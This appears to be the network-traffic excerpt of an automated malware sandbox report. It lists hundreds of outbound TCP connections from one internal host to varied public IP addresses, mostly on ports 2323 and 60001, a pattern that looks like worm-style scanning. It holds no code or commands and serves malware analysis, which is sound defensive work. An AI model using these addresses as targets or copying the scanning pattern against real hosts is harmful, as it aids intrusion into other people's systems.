    Source: global trafficTCP traffic: 192.168.2.23:62898 -> 35.64.46.99:2323
    Source: global trafficTCP traffic: 192.168.2.23:62898 -> 40.188.154.159:2323
    Source: global trafficTCP traffic: 192.168.2.23:62898 -> 44.223.115.5:2323
    Source: global trafficTCP traffic: 192.168.2.23:62898 -> 176.236.39.187:2323
    Source: global trafficTCP traffic: 192.168.2.23:62898 -> 20.142.145.139:2323
    Source: global trafficTCP traffic: 192.168.2.23:62898 -> 159.159.93.217:2323
    Source: global trafficTCP traffic: 192.168.2.23:62898 -> 43.224.253.60:2323
    Source: global trafficTCP traffic: 192.168.2.23:62898 -> 181.96.140.25:2323
    Source: global trafficTCP traffic: 192.168.2.23:48182 -> 104.244.72.234:64938
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 18.36.123.157:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 77.87.10.157:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 107.169.124.146:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 178.92.12.53:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 78.225.1.63:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 19.158.152.54:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 134.104.209.38:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 12.162.243.23:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 205.161.107.16:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 170.190.17.153:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 59.146.248.4:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 48.15.22.181:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 175.228.220.211:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 13.205.62.149:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 177.166.207.1:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 69.188.87.9:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 76.146.217.86:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 119.129.215.154:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 219.172.9.109:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 58.247.72.122:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 158.0.47.79:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 133.121.139.208:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 211.234.34.20:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 66.26.34.139:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 166.9.66.58:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 35.63.78.23:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 216.85.115.80:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 90.5.179.235:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 68.145.212.243:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 25.238.21.153:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 185.253.106.184:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 169.239.13.153:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 194.158.130.187:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 156.255.233.181:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 90.228.69.51:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 150.180.240.159:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 85.76.202.25:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 35.164.69.223:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 117.170.118.4:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 94.87.201.37:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 32.134.107.37:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 176.179.197.220:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 97.54.121.69:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 54.46.179.211:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 176.184.54.56:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 155.34.47.9:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 109.101.134.4:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 209.19.44.53:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 106.255.119.121:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 180.83.205.39:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 202.71.235.107:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 83.108.68.228:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 194.139.197.96:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 37.207.206.225:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 166.2.165.92:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 156.110.81.155:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 171.141.214.247:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 99.138.48.187:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 149.5.207.177:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 162.114.39.121:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 74.111.141.43:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 78.46.125.222:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 2.167.162.133:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 160.136.82.82:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 37.229.31.123:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 107.234.158.211:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 18.209.18.228:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 165.254.209.50:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 219.82.212.133:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 136.228.115.177:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 184.211.132.68:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 221.100.105.43:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 18.247.32.195:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 47.140.244.121:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 18.86.124.103:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 101.2.150.58:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 58.129.36.34:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 1.175.142.135:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 130.59.238.84:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 160.16.75.79:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 9.8.115.14:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 218.113.177.25:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 45.30.197.215:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 44.197.137.10:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 20.132.133.97:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 152.5.113.89:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 45.33.33.31:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 143.207.166.62:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 213.188.28.55:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 144.79.8.130:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 78.56.249.103:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 42.102.83.252:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 45.92.26.12:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 9.117.213.9:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 163.8.86.68:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 133.225.85.141:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 222.209.203.37:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 12.170.45.105:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 35.188.116.233:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 204.65.235.154:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 44.66.98.125:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 80.66.16.151:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 124.228.69.78:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 150.234.22.18:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 148.56.254.160:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 4.95.234.116:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 70.227.31.120:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 126.18.116.23:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 52.66.242.54:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 203.132.252.167:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 112.27.125.81:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 92.240.189.46:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 218.36.168.55:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 98.104.186.240:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 198.42.245.28:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 93.49.67.22:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 83.242.218.207:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 153.135.18.149:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 184.59.44.213:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 219.206.60.76:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 135.169.71.76:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 189.15.87.229:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 53.11.143.155:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 59.145.17.161:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 99.42.245.206:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 128.138.99.46:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 152.81.180.172:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 35.99.222.68:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 157.248.78.28:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 45.151.1.164:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 23.170.173.61:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 110.225.197.17:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 94.107.3.119:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 195.35.122.254:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 223.122.248.3:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 36.113.136.213:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 97.129.237.223:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 66.213.144.96:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 45.63.173.56:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 36.16.127.8:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 34.179.132.2:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 39.225.9.128:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 138.144.242.168:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 100.59.20.114:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 203.218.57.27:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 144.78.173.177:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 156.202.244.132:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 184.85.200.0:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 12.103.219.255:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 88.92.198.130:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 62.255.14.23:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 49.165.241.52:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 191.128.212.12:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 206.149.5.186:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 121.228.75.217:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 204.154.24.6:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 161.175.151.221:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 85.121.186.83:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 98.91.101.200:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 223.105.94.250:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 104.132.179.27:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 97.54.114.222:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 171.102.13.175:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 112.114.94.30:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 154.37.70.146:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 75.228.14.67:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 141.45.30.133:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 196.53.234.170:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 23.14.240.208:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 143.135.131.229:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 99.184.129.123:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 130.121.202.124:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 135.235.135.146:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 84.172.106.219:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 93.205.206.139:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 213.37.32.192:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 23.183.135.13:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 212.233.166.54:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 182.34.225.105:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 130.120.198.188:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 212.163.112.232:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 195.154.184.27:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 87.115.119.123:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 145.223.47.214:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 207.238.217.90:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 84.248.141.61:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 18.62.91.13:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 137.0.161.121:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 89.212.127.218:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 38.61.77.202:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 187.26.132.148:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 213.254.110.241:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 118.185.150.240:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 99.39.214.80:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 143.148.128.32:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 63.159.160.168:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 223.178.183.194:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 175.91.32.79:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 17.27.143.236:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 128.94.219.197:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 144.4.139.13:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 58.96.147.76:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 174.175.231.65:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 63.209.16.135:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 216.30.97.27:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 9.3.25.85:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 209.81.110.242:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 23.159.247.35:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 139.114.68.95:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 202.112.22.185:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 196.168.81.93:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 176.172.109.236:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 80.227.46.247:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 82.8.82.51:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 119.84.191.223:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 36.195.35.253:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 204.212.177.19:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 194.3.207.236:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 83.241.240.166:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 165.50.0.5:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 152.24.215.252:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 130.205.158.246:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 137.130.180.12:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 163.241.149.214:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 169.154.0.239:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 54.43.29.247:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 71.142.111.129:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 141.95.213.161:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 41.98.194.159:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 47.23.174.40:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 213.122.246.51:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 136.32.232.5:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 182.123.14.64:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 97.19.85.51:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 134.121.92.215:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 49.160.71.237:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 58.61.43.229:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 36.204.222.50:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 51.81.119.32:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 114.179.16.67:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 94.185.193.14:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 45.241.65.168:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 9.238.84.167:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 19.94.35.253:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 1.20.229.123:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 193.119.184.111:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 90.99.75.111:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 4.4.154.85:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 208.18.153.180:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 120.209.26.170:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 54.143.18.177:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 206.44.189.81:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 66.109.62.40:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 59.191.205.119:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 71.185.89.111:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 133.50.139.93:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 91.146.242.105:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 124.217.183.171:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 222.53.211.109:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 198.149.23.136:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 79.62.164.5:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 47.11.116.10:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 59.101.17.190:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 164.111.204.86:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 102.183.237.90:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 173.63.90.249:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 165.246.127.213:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 107.255.114.200:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 91.232.111.61:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 68.18.118.23:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 104.103.134.67:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 107.112.168.250:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 85.47.173.192:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 148.43.220.47:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 95.66.45.33:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 105.21.143.63:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 80.37.172.232:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 204.118.60.180:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 144.77.105.185:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 74.180.225.138:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 108.231.17.207:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 145.85.56.242:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 201.147.71.214:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 184.14.68.196:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 145.126.95.116:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 134.61.217.97:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 174.78.44.42:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 211.233.32.189:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 181.255.116.88:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 97.100.138.119:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 121.41.198.245:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 84.228.130.82:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 207.178.108.159:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 31.151.34.172:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 32.255.244.244:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 111.48.246.182:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 152.5.129.158:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 88.115.235.49:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 67.5.123.73:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 46.26.46.151:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 119.201.225.4:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 111.247.191.212:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 77.217.31.153:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 18.147.146.84:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 147.118.185.10:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 181.212.176.23:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 154.181.105.3:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 168.33.61.120:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 184.114.62.247:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 187.216.90.81:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 138.168.132.232:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 83.143.251.107:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 150.11.21.90:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 196.157.178.194:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 48.175.76.102:60001
    Source: global trafficTCP traffic: 192.168.2.23:62898 -> 165.186.196.221:2323
    Source: global trafficTCP traffic: 192.168.2.23:62898 -> 154.5.140.98:2323
    Source: global trafficTCP traffic: 192.168.2.23:62898 -> 123.49.171.251:2323
    Source: global trafficTCP traffic: 192.168.2.23:62898 -> 46.171.131.57:2323
    Source: global trafficTCP traffic: 192.168.2.23:62898 -> 129.101.4.63:2323
    Source: global trafficTCP traffic: 192.168.2.23:62898 -> 113.92.31.199:2323
    Source: global trafficTCP traffic: 192.168.2.23:62898 -> 194.89.84.55:2323
    Source: global trafficTCP traffic: 192.168.2.23:62898 -> 48.70.186.197:2323
    Source: global trafficTCP traffic: 192.168.2.23:62898 -> 61.84.81.125:2323
    Source: global trafficTCP traffic: 192.168.2.23:62898 -> 60.61.184.90:2323
    Source: global trafficTCP traffic: 192.168.2.23:62898 -> 132.113.246.172:2323
    Source: global trafficTCP traffic: 192.168.2.23:62898 -> 44.226.150.96:2323
    Source: global trafficTCP traffic: 192.168.2.23:62898 -> 122.191.133.54:2323
    Source: global trafficTCP traffic: 192.168.2.23:62898 -> 24.101.93.26:2323
    Source: global trafficTCP traffic: 192.168.2.23:62898 -> 204.195.7.251:2323
    Source: global trafficTCP traffic: 192.168.2.23:62898 -> 124.197.251.240:2323
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 86.80.174.146:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 27.86.27.2:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 71.210.73.112:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 23.29.49.251:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 84.221.142.125:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 50.110.179.60:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 65.127.143.43:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 5.146.175.11:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 157.241.71.35:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 159.129.179.129:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 154.34.159.161:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 79.36.239.27:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 98.10.61.147:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 166.153.238.3:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 208.72.143.170:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 86.191.3.30:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 144.194.15.198:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 1.4.211.8:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 113.86.118.173:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 105.85.100.216:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 137.179.29.3:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 114.154.113.140:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 90.199.199.161:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 159.86.91.117:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 157.137.45.186:60001
